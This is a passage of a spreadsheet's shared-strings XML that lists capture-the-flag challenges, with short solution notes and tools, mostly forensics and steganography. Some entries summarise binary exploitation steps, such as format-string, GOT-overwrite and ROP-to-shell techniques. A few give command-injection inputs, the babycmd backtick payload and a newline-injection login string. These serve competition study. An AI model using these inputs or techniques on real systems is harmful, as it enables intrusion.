  </si>
  <si>
    <t>DotNet Nurikabe Solver (https://sourceforge.net/projects/nurikabedotnet/)</t>
  </si>
  <si>
    <t>Xnginx</t>
  </si>
  <si>
    <t>ngix</t>
  </si>
  <si>
    <t xml:space="preserve">Find ngix conf file on server then use header manipulation to craft the necessary request </t>
  </si>
  <si>
    <t>PNG Uncorrupt</t>
  </si>
  <si>
    <t>given corrupted png</t>
  </si>
  <si>
    <t>unkown</t>
  </si>
  <si>
    <t>atk</t>
  </si>
  <si>
    <t>given data, find the picture</t>
  </si>
  <si>
    <t>convert atk to bmp</t>
  </si>
  <si>
    <t>XnConvert, 'cat unknown_2348c21020c876be4ae7d9eb19f8500a \begindata{raster,1}'</t>
  </si>
  <si>
    <t>stego400</t>
  </si>
  <si>
    <t>hour long video</t>
  </si>
  <si>
    <t>one square in each frame contains letter</t>
  </si>
  <si>
    <t>TIM</t>
  </si>
  <si>
    <t>retrieve the flag</t>
  </si>
  <si>
    <t>find answer in oldest commit</t>
  </si>
  <si>
    <t>decode QR</t>
  </si>
  <si>
    <t>pwntools, PIL, qrtools</t>
  </si>
  <si>
    <t>4w1h</t>
  </si>
  <si>
    <t>different locations</t>
  </si>
  <si>
    <t>find google map locations of each photo</t>
  </si>
  <si>
    <t>Haymarket</t>
  </si>
  <si>
    <t>find key on punch card</t>
  </si>
  <si>
    <t>punch card decoder</t>
  </si>
  <si>
    <t>http://www.kloth.net/services/cardpunch.php</t>
  </si>
  <si>
    <t>Heath Street</t>
  </si>
  <si>
    <t>ext4 file system</t>
  </si>
  <si>
    <t>find flag in deleted files</t>
  </si>
  <si>
    <t>use extundelete</t>
  </si>
  <si>
    <t>extundelete</t>
  </si>
  <si>
    <t>Riverside</t>
  </si>
  <si>
    <t>find NSA hack</t>
  </si>
  <si>
    <t>read mouse data</t>
  </si>
  <si>
    <t>tshark, matplotlib</t>
  </si>
  <si>
    <t>get help</t>
  </si>
  <si>
    <t>freenode chat</t>
  </si>
  <si>
    <t>flag is topic of the chat</t>
  </si>
  <si>
    <t xml:space="preserve">recon -1 </t>
  </si>
  <si>
    <t>website has older version</t>
  </si>
  <si>
    <t>inspect oldrer version of website and go to the new email link</t>
  </si>
  <si>
    <t>Homework</t>
  </si>
  <si>
    <t>12 scramble pieces to image</t>
  </si>
  <si>
    <t>combine pieces to get QR code</t>
  </si>
  <si>
    <t>photoshop/gimp</t>
  </si>
  <si>
    <t>relax and enjoy</t>
  </si>
  <si>
    <t>search video</t>
  </si>
  <si>
    <t>Screenshot frames with logos and google. Concatenate the results</t>
  </si>
  <si>
    <t>World Art</t>
  </si>
  <si>
    <t>9 streetview images</t>
  </si>
  <si>
    <t>find first two letters in street names</t>
  </si>
  <si>
    <t>search images</t>
  </si>
  <si>
    <t>find him</t>
  </si>
  <si>
    <t>search for name</t>
  </si>
  <si>
    <t>flag inside github commit for that user</t>
  </si>
  <si>
    <t>yacst</t>
  </si>
  <si>
    <t>Solve 5 audio capthcha</t>
  </si>
  <si>
    <t>ssdeep</t>
  </si>
  <si>
    <t>captcha</t>
  </si>
  <si>
    <t>find hidden png</t>
  </si>
  <si>
    <t>foremost</t>
  </si>
  <si>
    <t>midi</t>
  </si>
  <si>
    <t>read inside midi file</t>
  </si>
  <si>
    <t>poem</t>
  </si>
  <si>
    <t>extract hidden binary</t>
  </si>
  <si>
    <t>‘qpdf --qdf --object-streams=disable poem.pdf out.pdf’</t>
  </si>
  <si>
    <t>strange text</t>
  </si>
  <si>
    <t>plot the points</t>
  </si>
  <si>
    <t>tlsb</t>
  </si>
  <si>
    <t>find hidden data</t>
  </si>
  <si>
    <t>retrieve stored bits from lsb with python script</t>
  </si>
  <si>
    <t>russian doll</t>
  </si>
  <si>
    <t>hexdump image found on disk</t>
  </si>
  <si>
    <t>diskinternals EFS recovery (windows only)</t>
  </si>
  <si>
    <t>alien-contact</t>
  </si>
  <si>
    <t>SSTV</t>
  </si>
  <si>
    <t>Find flag in images</t>
  </si>
  <si>
    <t>put on martin1 mode and play the audio file, enter the coordinates that appear and scan the QR code to get the flag</t>
  </si>
  <si>
    <t>Any SSTV Software</t>
  </si>
  <si>
    <t>document troubles</t>
  </si>
  <si>
    <t xml:space="preserve">.docx </t>
  </si>
  <si>
    <t>What is a .docx</t>
  </si>
  <si>
    <t>.docx file is actually a zip file that contains the flag</t>
  </si>
  <si>
    <t>epilepsy warning</t>
  </si>
  <si>
    <t>.gif</t>
  </si>
  <si>
    <t>find the flag in the gif</t>
  </si>
  <si>
    <t>convert the .gif and open the images in stegosolve, scan the barcode to get the first part of the flag, listen to the audio track to get the second part</t>
  </si>
  <si>
    <t xml:space="preserve">linux command 'convert rave.gif rave.png' , stegsolve, </t>
  </si>
  <si>
    <t>logoventures 2: reloaded</t>
  </si>
  <si>
    <t>.jpg</t>
  </si>
  <si>
    <t>what is .jpg</t>
  </si>
  <si>
    <t>flag is contained in the metadata</t>
  </si>
  <si>
    <t>logoventures 2</t>
  </si>
  <si>
    <t>use imagemagic to split the image into seprate frames, the flag is contained in logo-0.png</t>
  </si>
  <si>
    <t>imagemagic / any gif splitter</t>
  </si>
  <si>
    <t>mondiran</t>
  </si>
  <si>
    <t>youtube video</t>
  </si>
  <si>
    <t>can you find the flag in the youtube video?</t>
  </si>
  <si>
    <t>take the first letter of each spoken word to from 'webdriver', then overlay each rectangle to get 'torso'. Enter the phrase into the software to get a second image which is actually a program writen piet. get a piet interpreter and run the program to get the flag</t>
  </si>
  <si>
    <t>openpuff stego software</t>
  </si>
  <si>
    <t>ryan gooseling</t>
  </si>
  <si>
    <t>disk img .img</t>
  </si>
  <si>
    <t xml:space="preserve">basic .img carving </t>
  </si>
  <si>
    <t>Use foremost to carve images from the given data, 00002562.jpg contains the flag</t>
  </si>
  <si>
    <t>scan me</t>
  </si>
  <si>
    <t>broken qr code</t>
  </si>
  <si>
    <t>fix the qr code</t>
  </si>
  <si>
    <t>Open up gimp and create a bigger image than given and paste the broken qr code in, then scan for flag</t>
  </si>
  <si>
    <t>Any Online QR decoder</t>
  </si>
  <si>
    <t xml:space="preserve">SHARKNADO! </t>
  </si>
  <si>
    <t>.pcap</t>
  </si>
  <si>
    <t>basic wireshark useage</t>
  </si>
  <si>
    <t>filter the traffic 'http.request.method==POST' to find the flag</t>
  </si>
  <si>
    <t>Wireshark</t>
  </si>
  <si>
    <t>gife-up-now</t>
  </si>
  <si>
    <t>qr codes</t>
  </si>
  <si>
    <t>image time delay, convert to ascii</t>
  </si>
  <si>
    <t>imagemagick</t>
  </si>
  <si>
    <t>Super Turbo Atomic GIF Converter</t>
  </si>
  <si>
    <t>ffmpeg can open file://</t>
  </si>
  <si>
    <t>ffmpeg</t>
  </si>
  <si>
    <t>APT-incident-response-400</t>
  </si>
  <si>
    <t>debian mem dump</t>
  </si>
  <si>
    <t>debian memory dump</t>
  </si>
  <si>
    <t>find inode position of deleted payload</t>
  </si>
  <si>
    <t>volatility</t>
  </si>
  <si>
    <t>hidden file</t>
  </si>
  <si>
    <t>JPG image files</t>
  </si>
  <si>
    <t>See the Picture</t>
  </si>
  <si>
    <t xml:space="preserve">extract the thumbs.db using 7z, delete catalog and extract metadata bytes using ' for i in *; do xxd -s12 -p "$i" | xxd -r -p &gt; "jpgs/$i.jpg"; done' </t>
  </si>
  <si>
    <t xml:space="preserve">tricky authorization </t>
  </si>
  <si>
    <t>Can you find the traffic?</t>
  </si>
  <si>
    <t>Follow the TCP stream in wireshark using the filter 'filter: tcp.port eq 11811' (web)</t>
  </si>
  <si>
    <t>run the image</t>
  </si>
  <si>
    <t>Why can't we run this image in DOS?</t>
  </si>
  <si>
    <t>hidden PE32 executable embedded in .jpg, extract the exe and run in online sandbox for flag. (forensics)</t>
  </si>
  <si>
    <t>binwalk, foremost</t>
  </si>
  <si>
    <t>strange spam</t>
  </si>
  <si>
    <t>Find the hidden message</t>
  </si>
  <si>
    <t>decode the given message using the spam site you find on google (forensics)</t>
  </si>
  <si>
    <t>tacticus abilitus</t>
  </si>
  <si>
    <t>.png</t>
  </si>
  <si>
    <t>There are malformed characters in the provided image, write them all down to get the flag</t>
  </si>
  <si>
    <t>the great thing</t>
  </si>
  <si>
    <t>wikipedia article</t>
  </si>
  <si>
    <t>contatinate the given wiki article with the actual wiki page to find the flag</t>
  </si>
  <si>
    <t>Cipollino, little onion</t>
  </si>
  <si>
    <t>We love containers</t>
  </si>
  <si>
    <t>jpg is actually a rar archive that contains a QR code. The QR code decodes into c++, when run the C++ spits out base64 encoded python code, run the py code to get hex, turn hex into ascii for flag (forensics)</t>
  </si>
  <si>
    <t>Any online QR decoder</t>
  </si>
  <si>
    <t>Highly professional</t>
  </si>
  <si>
    <t>Find the owner</t>
  </si>
  <si>
    <t>Google for 'mr robot allsafe owner' - Gideon Goddard (forensics)</t>
  </si>
  <si>
    <t>Information Leak</t>
  </si>
  <si>
    <t>What are we talking about?</t>
  </si>
  <si>
    <t>The photo contains flag transformations listed on the white board. The only challenege with a QR code is Cipollino, little onion, which is the flag (forensics)</t>
  </si>
  <si>
    <t>Fovourite Song</t>
  </si>
  <si>
    <t>.mp3</t>
  </si>
  <si>
    <t>Can you hear the message?</t>
  </si>
  <si>
    <t>Analyze the waveform, the peaks of the waveform are morse code. Long peak for dash and short peak for dot. (forensics)</t>
  </si>
  <si>
    <t>Meaningless Text</t>
  </si>
  <si>
    <t>html filled with text</t>
  </si>
  <si>
    <t>What are these words?</t>
  </si>
  <si>
    <t xml:space="preserve">Use grep to cut all the words with the &lt;e&gt; tag, this will leave you with text of one or zero. Translate the binary text into ASCII. 'grep -o -e "&lt;e&gt;[^/]*&lt;/e&gt;" st2.html' </t>
  </si>
  <si>
    <t>Pure Color</t>
  </si>
  <si>
    <t>What does color have to do with pictures?</t>
  </si>
  <si>
    <t xml:space="preserve">Change the background color or look at the screen with an angle </t>
  </si>
  <si>
    <t>Yve’s Fave Pic</t>
  </si>
  <si>
    <t>find hidden message</t>
  </si>
  <si>
    <t>unzip file in jpg, python script to pull out flag</t>
  </si>
  <si>
    <t>49 Shades of gray</t>
  </si>
  <si>
    <t>one shade missing</t>
  </si>
  <si>
    <t>python script to get all rgb values</t>
  </si>
  <si>
    <t>A picture is worth a thousand words</t>
  </si>
  <si>
    <t>text files</t>
  </si>
  <si>
    <t>find jpg among files</t>
  </si>
  <si>
    <t>file * | grep 'JPEG’</t>
  </si>
  <si>
    <t>accelerator</t>
  </si>
  <si>
    <t>search for %EOF</t>
  </si>
  <si>
    <t>.wav file hidden in pdf, baconian cipher on the second track</t>
  </si>
  <si>
    <t>audacity, http://rumkin.com/tools/cipher/baconian.php</t>
  </si>
  <si>
    <t>FSB: TreeWalker</t>
  </si>
  <si>
    <t>pwnable exploit</t>
  </si>
  <si>
    <t>socat TCP-LISTEN:1337,reuseaddr,fork EXEC:./treewalker'</t>
  </si>
  <si>
    <t>objdump</t>
  </si>
  <si>
    <t>SYSCALL:Impossible</t>
  </si>
  <si>
    <t>read flag and write to stdout</t>
  </si>
  <si>
    <t>python script to search for ram loaction</t>
  </si>
  <si>
    <t>deceptive ports</t>
  </si>
  <si>
    <t>can't beat boss</t>
  </si>
  <si>
    <t xml:space="preserve">godmode </t>
  </si>
  <si>
    <t>(http://en.wikipedia.org/wiki/Glossary_of_video_game_terms)</t>
  </si>
  <si>
    <t>an apple a day keeps the dinosaur away?</t>
  </si>
  <si>
    <t>strings -a apple.jpg | grep 'easyctf'</t>
  </si>
  <si>
    <t>medium/hard</t>
  </si>
  <si>
    <t>find message in image</t>
  </si>
  <si>
    <t>google image search to find original then diff them, python script to pull out differences and convert binary to ASCII</t>
  </si>
  <si>
    <t>password manager</t>
  </si>
  <si>
    <t>iSpy</t>
  </si>
  <si>
    <t>password safe 3</t>
  </si>
  <si>
    <t>pcapng</t>
  </si>
  <si>
    <t>crack password manager</t>
  </si>
  <si>
    <t>use masked process to pipe with the passwordmanager text file</t>
  </si>
  <si>
    <t>find suspicious network activity</t>
  </si>
  <si>
    <t>export all .png, ‘File-&gt;Export Objects-&gt;HTTP-&gt;Save all’</t>
  </si>
  <si>
    <t>liar</t>
  </si>
  <si>
    <t>zip archive</t>
  </si>
  <si>
    <t>find the secret in the file</t>
  </si>
  <si>
    <t>fix file signatures</t>
  </si>
  <si>
    <t>ghex</t>
  </si>
  <si>
    <t>reversing-pyschology</t>
  </si>
  <si>
    <t>flag in debugger</t>
  </si>
  <si>
    <t>lolteam</t>
  </si>
  <si>
    <t>find password change</t>
  </si>
  <si>
    <t>follow TCP stream,‘Analyze-&gt;Follow-&gt;TCP Stream’</t>
  </si>
  <si>
    <t>pixels</t>
  </si>
  <si>
    <t>do math on images</t>
  </si>
  <si>
    <t>login!</t>
  </si>
  <si>
    <t>‘convert mystery1.png mystery2.png -compose difference -composite -colorspace Gray new.png’</t>
  </si>
  <si>
    <t>ImageMagick</t>
  </si>
  <si>
    <t>strcmp</t>
  </si>
  <si>
    <t>script to overwrite strcmp</t>
  </si>
  <si>
    <t>rest in pepperoni-pizza</t>
  </si>
  <si>
    <t>find image in pdf</t>
  </si>
  <si>
    <t>extract image with foremost and photoshop to solve puzzle</t>
  </si>
  <si>
    <t>foremost, photoshop/gimp</t>
  </si>
  <si>
    <t>prng service</t>
  </si>
  <si>
    <t>sayonara</t>
  </si>
  <si>
    <t>flag is stored at 0 index</t>
  </si>
  <si>
    <t>mp3</t>
  </si>
  <si>
    <t>takes negative numbers, -64 = 0</t>
  </si>
  <si>
    <t>find message in mp3</t>
  </si>
  <si>
    <t>find spectrogram in second channel of song and lower the sample rate</t>
  </si>
  <si>
    <t>who is this god?</t>
  </si>
  <si>
    <t>everything you need is in the image</t>
  </si>
  <si>
    <t>use tool to increase contrast</t>
  </si>
  <si>
    <t>echoes</t>
  </si>
  <si>
    <t>https://29a.ch/photo-forensics/#forensic-magnifier</t>
  </si>
  <si>
    <t>yodigga</t>
  </si>
  <si>
    <t>IOException</t>
  </si>
  <si>
    <t>read source code to find out the name of the source code that has the flag</t>
  </si>
  <si>
    <t>piece together clues from the internet</t>
  </si>
  <si>
    <t>Need to find 4 separate parts https://gist.github.com/ndefilippis/b1d8e5a954d717734ca8</t>
  </si>
  <si>
    <t>easy-math</t>
  </si>
  <si>
    <t>shell function</t>
  </si>
  <si>
    <t>python script to calculate the address to access the shell function</t>
  </si>
  <si>
    <t>Now You See Me, Now You Don’t</t>
  </si>
  <si>
    <t>find hidden file on linux</t>
  </si>
  <si>
    <t>ls -a</t>
  </si>
  <si>
    <t>Mrrow?????</t>
  </si>
  <si>
    <t>txt</t>
  </si>
  <si>
    <t>file owner</t>
  </si>
  <si>
    <t>goto</t>
  </si>
  <si>
    <t>ls -l file.txt</t>
  </si>
  <si>
    <t>set breakpoint for gdp-peda and look at flag value</t>
  </si>
  <si>
    <t>San Francisco Symphony</t>
  </si>
  <si>
    <t>search file</t>
  </si>
  <si>
    <t>strings sfs|grep easyctf</t>
  </si>
  <si>
    <t>did you mean</t>
  </si>
  <si>
    <t>Hijacked</t>
  </si>
  <si>
    <t>unknown file</t>
  </si>
  <si>
    <t>find / -user l33t_haxx0r 2&gt; /dev/null, open in vim</t>
  </si>
  <si>
    <t>Same Difference</t>
  </si>
  <si>
    <t>compare files</t>
  </si>
  <si>
    <t>diff --suppress-common-lines master_copy.txt suspicious.txt</t>
  </si>
  <si>
    <t>its-hungry</t>
  </si>
  <si>
    <t>.flac</t>
  </si>
  <si>
    <t>spectrogram</t>
  </si>
  <si>
    <t>convert morse code</t>
  </si>
  <si>
    <t>metaflac;sox</t>
  </si>
  <si>
    <t>sox oldmcdonald.flac -n trim 55 5 spectrogram -o spectrogram-55-5.png</t>
  </si>
  <si>
    <t>hard to say</t>
  </si>
  <si>
    <t>john-in-the-middle</t>
  </si>
  <si>
    <t>ruby on fails</t>
  </si>
  <si>
    <t>different image</t>
  </si>
  <si>
    <t>use Ruby backtick operator to execute shell command</t>
  </si>
  <si>
    <t>open with stegsolve</t>
  </si>
  <si>
    <t>interview</t>
  </si>
  <si>
    <t>quote from "Swordfish"</t>
  </si>
  <si>
    <t>scene in movie has ip address, connect to ssh with the ip address</t>
  </si>
  <si>
    <t>lightning</t>
  </si>
  <si>
    <t>picture of circuit</t>
  </si>
  <si>
    <t>reverse engineer circuit manually</t>
  </si>
  <si>
    <t>matrix X matrix</t>
  </si>
  <si>
    <t>find the bugs</t>
  </si>
  <si>
    <t>find bugs and write script to exploit the bugs</t>
  </si>
  <si>
    <t>dropper</t>
  </si>
  <si>
    <t>ping and request 2,4,6 are dropped.</t>
  </si>
  <si>
    <t>Convert drops to morse code</t>
  </si>
  <si>
    <t>Nullcon-hackim</t>
  </si>
  <si>
    <t>Exploitation 1</t>
  </si>
  <si>
    <t>buffer overflow in stack using echo command during sprintf()</t>
  </si>
  <si>
    <t>cloudfs</t>
  </si>
  <si>
    <t>find the key</t>
  </si>
  <si>
    <t>convert pcapng to pcap, extract binary, convert 5C8 file to tar and extract</t>
  </si>
  <si>
    <t>binwalk (firmware analysis tool)</t>
  </si>
  <si>
    <t>Rubicon</t>
  </si>
  <si>
    <t>tcp dump</t>
  </si>
  <si>
    <t>find the culprit</t>
  </si>
  <si>
    <t>zip file hidden within binary</t>
  </si>
  <si>
    <t>wireshark, openssl, binwalk</t>
  </si>
  <si>
    <t>Exploitation 2</t>
  </si>
  <si>
    <t>the alpha molecule</t>
  </si>
  <si>
    <t>shell code to write flag to stdout with known offset</t>
  </si>
  <si>
    <t>python script to convert png to gif</t>
  </si>
  <si>
    <t>‘ffmpeg -framerate 75 -i 'test%04d0000.png' alpha.gif’</t>
  </si>
  <si>
    <t>serial_killer</t>
  </si>
  <si>
    <t>.sqlite_history</t>
  </si>
  <si>
    <t>users search history</t>
  </si>
  <si>
    <t>find where user went on web and find the photo they searched</t>
  </si>
  <si>
    <t>Exploitation 3</t>
  </si>
  <si>
    <t>strangelmage</t>
  </si>
  <si>
    <t>Use memcpy() to overflow buffer</t>
  </si>
  <si>
    <t>.jpeg</t>
  </si>
  <si>
    <t>hidden rar archive &gt; qr codes</t>
  </si>
  <si>
    <t>zbarimg the qr images, leads to hidden qr, stegsolve for morse code flag</t>
  </si>
  <si>
    <t>binwalk;zbarimg</t>
  </si>
  <si>
    <t>garbage-file</t>
  </si>
  <si>
    <t>Exploitation 4</t>
  </si>
  <si>
    <t>alternating bits = counter</t>
  </si>
  <si>
    <t>overwrite GOT entry to get a shell with python script</t>
  </si>
  <si>
    <t>python script to xor two bytearrays given in hexadecimal</t>
  </si>
  <si>
    <t>defensive 300</t>
  </si>
  <si>
    <t>Pcap file contains backdoor traffic</t>
  </si>
  <si>
    <t>Use the Chopshop framework and the provided .py file to dump the stolen data to retrieve the flag</t>
  </si>
  <si>
    <t>Exploitation 5</t>
  </si>
  <si>
    <t>python script to overwrite node pointers</t>
  </si>
  <si>
    <t>Password Encrypting Tool</t>
  </si>
  <si>
    <t>Exploit the binary</t>
  </si>
  <si>
    <t>Stack overflow via 'gets' function, jump to the hidden function to get the flag</t>
  </si>
  <si>
    <t xml:space="preserve">hopper, ida, radare2 </t>
  </si>
  <si>
    <t>Such Exploit, Much Random</t>
  </si>
  <si>
    <t xml:space="preserve">Nopsled with some trickary </t>
  </si>
  <si>
    <t>others 100</t>
  </si>
  <si>
    <t>PDF</t>
  </si>
  <si>
    <t>Several PDF data values need to be restored before the PDF will open. Use PDF Walker to do this (forensics)</t>
  </si>
  <si>
    <t xml:space="preserve">Several PDF data values need to be restored before the PDF will open. Use PDF Walker to do this </t>
  </si>
  <si>
    <t>DefCon Quals</t>
  </si>
  <si>
    <t>babycmd</t>
  </si>
  <si>
    <t>The binary does no loop checking over the input of your string. Meaning only the first and last chars of your string are checked for conformity. This allows you to sneak commands in like so 'l`ls\t-la\thome`1' which will allow you to dump the flag</t>
  </si>
  <si>
    <t>IDA, Radare2, Hopper</t>
  </si>
  <si>
    <t>kicker-of-elves</t>
  </si>
  <si>
    <t>x86 elf binary</t>
  </si>
  <si>
    <t>broken binary</t>
  </si>
  <si>
    <t>xorsearch for flag</t>
  </si>
  <si>
    <t>xorsearch</t>
  </si>
  <si>
    <t>babyecho</t>
  </si>
  <si>
    <t>olive</t>
  </si>
  <si>
    <t>execute a shell for the flag</t>
  </si>
  <si>
    <t>recover flag from session</t>
  </si>
  <si>
    <t>Execute a format string to overwrite the default buffer size of 13 to enable the max 1023 buffer size. Then send your shellcode to get the flag!</t>
  </si>
  <si>
    <t>find VNC packet with flag</t>
  </si>
  <si>
    <t>pwntools,  libformatstr</t>
  </si>
  <si>
    <t>poltergeist</t>
  </si>
  <si>
    <t>avi</t>
  </si>
  <si>
    <t>find message</t>
  </si>
  <si>
    <t>use AM radio to play video</t>
  </si>
  <si>
    <t>https://cryptome.org/2015/09/tempest-test-for-windows.htm</t>
  </si>
  <si>
    <t>r0pbaby</t>
  </si>
  <si>
    <t>build yourself a simple rop to exploit the binary</t>
  </si>
  <si>
    <t>press it</t>
  </si>
  <si>
    <t>recover flag</t>
  </si>
  <si>
    <t>translate the scancodes</t>
  </si>
  <si>
    <t>blocking tuck</t>
  </si>
  <si>
    <t>look at blue truck</t>
  </si>
  <si>
    <t>paste address into google maps and view streetview</t>
  </si>
  <si>
    <t>slogans</t>
  </si>
  <si>
    <t>find the past slogans</t>
  </si>
  <si>
    <t>intext:ekoparty intext:2008 intext:slogan' go to blog and find slogans</t>
  </si>
  <si>
    <t>Mr. Anderson</t>
  </si>
  <si>
    <t>favorite artist of last hacker series</t>
  </si>
  <si>
    <t>google Mr Robot and find answer in imdb link</t>
  </si>
  <si>
    <t>banner</t>
  </si>
  <si>
    <t>find flag in the stand</t>
  </si>
  <si>
    <t>cybergrandsandbox</t>
  </si>
  <si>
    <t>find picture from twitter</t>
  </si>
  <si>
    <t>cgc binary</t>
  </si>
  <si>
    <t>ssl attack</t>
  </si>
  <si>
    <t>per writeup: break jit-code pattern, reach shellcode, execute 4 bytes and use 2 bytes for chaining</t>
  </si>
  <si>
    <t>find name of the ssl attack</t>
  </si>
  <si>
    <t>intext:ekoparty intext:ssl' google answer</t>
  </si>
  <si>
    <t>Broken Heart</t>
  </si>
  <si>
    <t>There's a broken HTTP transfer in the capture</t>
  </si>
  <si>
    <t>Carve the 23 portions of the image out of the pcap, string them together and replace the missing 13 bytes of the file with the necessary PNG header</t>
  </si>
  <si>
    <t>fuckup</t>
  </si>
  <si>
    <t>custom binary</t>
  </si>
  <si>
    <t>Math... https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/pwnable/fuckup</t>
  </si>
  <si>
    <t>Task Dump</t>
  </si>
  <si>
    <t>Virtual Box .Sav file</t>
  </si>
  <si>
    <t>Find the data hidden in the VM</t>
  </si>
  <si>
    <t xml:space="preserve">Restore the .sav VM then use a memory scraper to pull the needed code from memory. Execute the code and you'll get the flag </t>
  </si>
  <si>
    <t>hackercalc</t>
  </si>
  <si>
    <t>x86 binary</t>
  </si>
  <si>
    <t>Keka Bomb</t>
  </si>
  <si>
    <t>exploit the langauge</t>
  </si>
  <si>
    <t xml:space="preserve">gain remote code execution in a custom language / interpreter </t>
  </si>
  <si>
    <t>7z archive</t>
  </si>
  <si>
    <t>Given Archive is a Space bomb</t>
  </si>
  <si>
    <t>Keep extracting each archive with the unique CRC until you reach bomb_08 then run 'strings' against the file</t>
  </si>
  <si>
    <t>linux command: 'strings'</t>
  </si>
  <si>
    <t>My Ped</t>
  </si>
  <si>
    <t>Theres some hidden data here</t>
  </si>
  <si>
    <t>Compile a copy of Zpaq and use it to unarchive the 17 missing parts of the flag (forensics)</t>
  </si>
  <si>
    <t>Zrypt</t>
  </si>
  <si>
    <t>Crack the archive</t>
  </si>
  <si>
    <t>Find the SHA-1 inside of the zip, google it to get plaintext to use in our plaintext attack against the archive. Once you have the partial plaintext it is possible to crack the archives using Pkcrack</t>
  </si>
  <si>
    <t>int3rupted</t>
  </si>
  <si>
    <t>leak libc address of puts, compute your offset to system, pop /bin/sh into the $rdi, and call system</t>
  </si>
  <si>
    <t>radare2, hopper</t>
  </si>
  <si>
    <t>aGFtcHduZXIz</t>
  </si>
  <si>
    <t>twentyfiveseventy</t>
  </si>
  <si>
    <t>surname</t>
  </si>
  <si>
    <t>google -&gt; quizlet -&gt; youtube -&gt; google translate comment</t>
  </si>
  <si>
    <t>implement your own version of SNMP! then leak the time the binary generates the auth key and pass that to your implementation to generate the correct auth key. (pwn)</t>
  </si>
  <si>
    <t>blind</t>
  </si>
  <si>
    <t>There is Brainloller code hidden in the blue pixils of the image. 240 = &gt; and 241 = &gt;. Translate the code and run the resulting bf code</t>
  </si>
  <si>
    <t>stegosolve</t>
  </si>
  <si>
    <t>Number pi</t>
  </si>
  <si>
    <t>wibbly wobbly timey wimey</t>
  </si>
  <si>
    <t>execute arbitrary code</t>
  </si>
  <si>
    <t xml:space="preserve">Install PI-FS and mount the file system -&gt; open the flagbin to retrieve the flag </t>
  </si>
  <si>
    <t>leak the address and calculate the return offset. Leak the return address and calculate the text base address. Caculate atof GOT and leak the function ptr. Calculate system address and overwrite atof GOT entry. Input coordinates [command],[garbage] to execute arbitrary code</t>
  </si>
  <si>
    <t>risky</t>
  </si>
  <si>
    <t xml:space="preserve">Blue Freeze </t>
  </si>
  <si>
    <t>RISC-V ELF</t>
  </si>
  <si>
    <t>Use after free condition, then create a fake note and id that you can then edit to achieve arbitrary read / write</t>
  </si>
  <si>
    <t>get riscv toolchain, python script</t>
  </si>
  <si>
    <t>Hopper, ida, radare</t>
  </si>
  <si>
    <t>Riscsv-tools (https://riscv.org/software-tools/#tab_tools)</t>
  </si>
  <si>
    <t>MBTI</t>
  </si>
  <si>
    <t>Answer all of the correct personality test questions</t>
  </si>
  <si>
    <t>Use the Scapy library to do statistical analysis on the provided traffic. Pick all of the correct answers in the right order to retrieve the flag (forensics)</t>
  </si>
  <si>
    <t>Multiple vunerablilites exist. However, the easist route is a format string vunerability</t>
  </si>
  <si>
    <t>big-lie</t>
  </si>
  <si>
    <t>Find the flag</t>
  </si>
  <si>
    <t>You need the secret location hash to decrypt the secret. However Piwik will show you the full secret apparently (web / forensics)</t>
  </si>
  <si>
    <t>Stackstuff</t>
  </si>
  <si>
    <t>http://toh.necst.it/hack.lu/2015/exploitable/StackStuff/</t>
  </si>
  <si>
    <t>particles</t>
  </si>
  <si>
    <t>Find the image</t>
  </si>
  <si>
    <t>pcap contains 6 SHA-1 hashes of files transfered using zsync. Google the hashes and you'll find a screenshot with the flag</t>
  </si>
  <si>
    <t>strange</t>
  </si>
  <si>
    <t>extract the hidden image data</t>
  </si>
  <si>
    <t>use binwalk to extract the binary data from the file. then use Python image library to render the data to retrieve the flag (forensics)</t>
  </si>
  <si>
    <t>binwalk</t>
  </si>
  <si>
    <t>Bashful</t>
  </si>
  <si>
    <t>flag-hunter</t>
  </si>
  <si>
    <t>exploit the shell</t>
  </si>
  <si>
    <t>travel the world</t>
  </si>
  <si>
    <t>Use the shellshock exploit to gain access to the flag</t>
  </si>
  <si>
    <t>Use a VPN to capture all 6 parts of the flag by clicking on various parts of the providied map. (misc)</t>
  </si>
  <si>
    <t>Any VPN</t>
  </si>
  <si>
    <t>meow-meow</t>
  </si>
  <si>
    <t>translate the code</t>
  </si>
  <si>
    <t>Change the underscores in the code to the # of underscores counted to evaluate the code (misc)</t>
  </si>
  <si>
    <t>calm-down</t>
  </si>
  <si>
    <t>text file</t>
  </si>
  <si>
    <t>What is the matching grep command for ASIS flags?</t>
  </si>
  <si>
    <t>ASIS Flags follow a specific format. 32 bytes long ASIS{.....}. The flags contain the characters 0-9, a-f. Grep for the matching flag 'grep -aE ASIS\{[0-9a-f]{32}\} flagBag.txt' (forensics)</t>
  </si>
  <si>
    <t>Grep 'grep -aE ASIS\{[0-9a-f]{32}\} flagBag.txt'</t>
  </si>
  <si>
    <t>ones and zer0s</t>
  </si>
  <si>
    <t>.mpeg</t>
  </si>
  <si>
    <t>find the hidden flag</t>
  </si>
  <si>
    <t>.mpeg is really just a binary dump. Use binwalk or xxd to extract the relevant parts and then convert the binary to ascii for the flag (forensics)</t>
  </si>
  <si>
    <t>xxd -ps eps1.1_ones-and-zer0es_c4368e65e1883044f3917485ec928173.mpeg | sed 's/30/0/g' | sed 's/31/1/g' | tr -d '\n''</t>
  </si>
  <si>
    <t>RPS</t>
  </si>
  <si>
    <t>x86-64 elf</t>
  </si>
  <si>
    <t>notesy</t>
  </si>
  <si>
    <t>Beat rock paper scissors</t>
  </si>
  <si>
    <t>the english alphabet</t>
  </si>
  <si>
    <t>buffer overflow to overwrite the value produced by srand() creating predictable output. Then simply write a script to play the game for you</t>
  </si>
  <si>
    <t>Do you know your alphabet?</t>
  </si>
  <si>
    <t>pwntools, hopper, ida, radare2</t>
  </si>
  <si>
    <t>It's a substituation cipher, the key is literally the english alphabet A-Z</t>
  </si>
  <si>
    <t>.img</t>
  </si>
  <si>
    <t>find the data in the img</t>
  </si>
  <si>
    <t>mount the image or just simply run strings against the image for the flag</t>
  </si>
  <si>
    <t>linux command: 'igrep'</t>
  </si>
  <si>
    <t>keep calm and ctf</t>
  </si>
  <si>
    <t>SecureAuth</t>
  </si>
  <si>
    <t>find the flag in the image</t>
  </si>
  <si>
    <t>use exiftool or strings to find the flag hidden in the metadata</t>
  </si>
  <si>
    <t>Provided login code has a bug allowing you to execute arbitray commands if you send newline chars. Use '« admin:name\r\nGET\t »'</t>
  </si>
  <si>
    <t>transfer</t>
  </si>
  <si>
    <t>get the required code</t>
  </si>
  <si>
    <t>unoriginal</t>
  </si>
  <si>
    <t>Basic ROP stackoverflow with assitance from gdb-peda</t>
  </si>
  <si>
    <t>pwn 100</t>
  </si>
  <si>
